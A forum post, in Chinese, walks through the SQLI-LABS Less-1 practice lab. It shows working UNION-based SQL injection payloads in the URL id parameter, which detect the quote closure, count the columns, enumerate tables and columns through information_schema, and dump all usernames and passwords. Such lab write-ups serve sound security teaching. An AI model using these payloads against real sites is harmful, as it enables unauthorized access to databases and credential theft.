农妇山泉一亩田 发表于 2022-9-16 22:23:27

SQLI-LABS(Less-1)

Less-1(GET-Error-Single quotes-String)

https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904190131468-716426540.png
打开Less-1页面,可以看到页面中间有一句Please input the ID as parameter with numeric value,那么先使用ID这个参数通过GET方式传入一个数值。
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904190454966-1798682834.png
通过传入id=1看到页面上查询结果是有回显的,接着尝试一下?id=1'
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904193040146-1995449764.png
可以看到页面报错了,说明id=1'导致SQL语句产生了歧义。通过报错信息可以看出闭合SQL语句时用的是单引号。
关于在HTTP请求中的注释问题:

[*]在浏览器的GET请求中,URL中#号是用来指导浏览器动作的(例如锚点),对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错。
[*]而使用-- ,在传输过程中空格会被忽略,同样导致无法注释。
[*]所以在GET请求传参注入时可以使用--+的方式来闭合,因为+会被解释成空格。
[*]除此之外,可以使用%23代替#,使用--%20代替--+。
这里使用?id=1' --+进行闭合注释。
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904194910223-1871609090.png
接下来通过order by判断该表的字段数量(order by语句用于根据指定的列对结果集进行排序),URL后面拼接?id=1' order by 1--+看是否报错:
注入语句:?id=1' order by 1 --+
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904203956641-148960247.png
接着继续尝试?id=1' order by 2--+,?id=1' order by 3--+,当尝试到4时,发现页面报错了,说明该表依据第4列进行排序时,发生了错误,表明该表只有3列。
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904204116262-730629456.png
接着使用联合查询,看看是哪几列会回显到前端页面:
注入语句:?id=1' and 1=2 union select 1,2,3 --+
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904211813257-1706883336.png
这里使用and 1=2是为了让union之前的语句为假,从而不回显在前端页面,而union结果集中的列名总是等于union中第一个select语句中的列名,这样就可以通过前端页面的回显知道前端页面显示的数据表的第几列。从上图中可以看出该数据表的第二列和第三列会回显在前端页面上,这样就可以通过数据库自带的函数:user()、database()、version()替换2和3,注入得出连接数据库用户以及数据库名称。
注入语句:?id=1' and 1=2 union select 1,database(),user() --+
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904212822552-451911833.png
通过上述注入可以得知,当前数据库名为security,当前用户为root,接着找出这个数据库中的所有数据表。
关于information_schema库:

[*]information_schema库用于存储数据库的元数据,例如information_schema库中的schemata表存储了数据库中所有的库信息、tables表存储数据库中的表信息,包括表属于哪个数据库,表的类型、存储引擎等信息、columns表存储表中的列信息,比如表有多少列、每个列的类型等
接着爆出当前库中的所有表名,通过group_concat将相同分组中的结果进行连接:
注入语句:?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904214256796-1292975158.png
下一步爆出users数据中的所有列名:
注入语句:?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() --+
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904215245816-364233681.png
最后爆出users表中的用户名和密码:
注入语句:?id=1' and 1=2 union select 1,group_concat(username),group_concat(password) from users --+
https://img2022.cnblogs.com/blog/1417438/202209/1417438-20220904215521298-6687129.png
到此,就得到了当前表中所有的用户名和密码。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: SQLI-LABS(Less-1)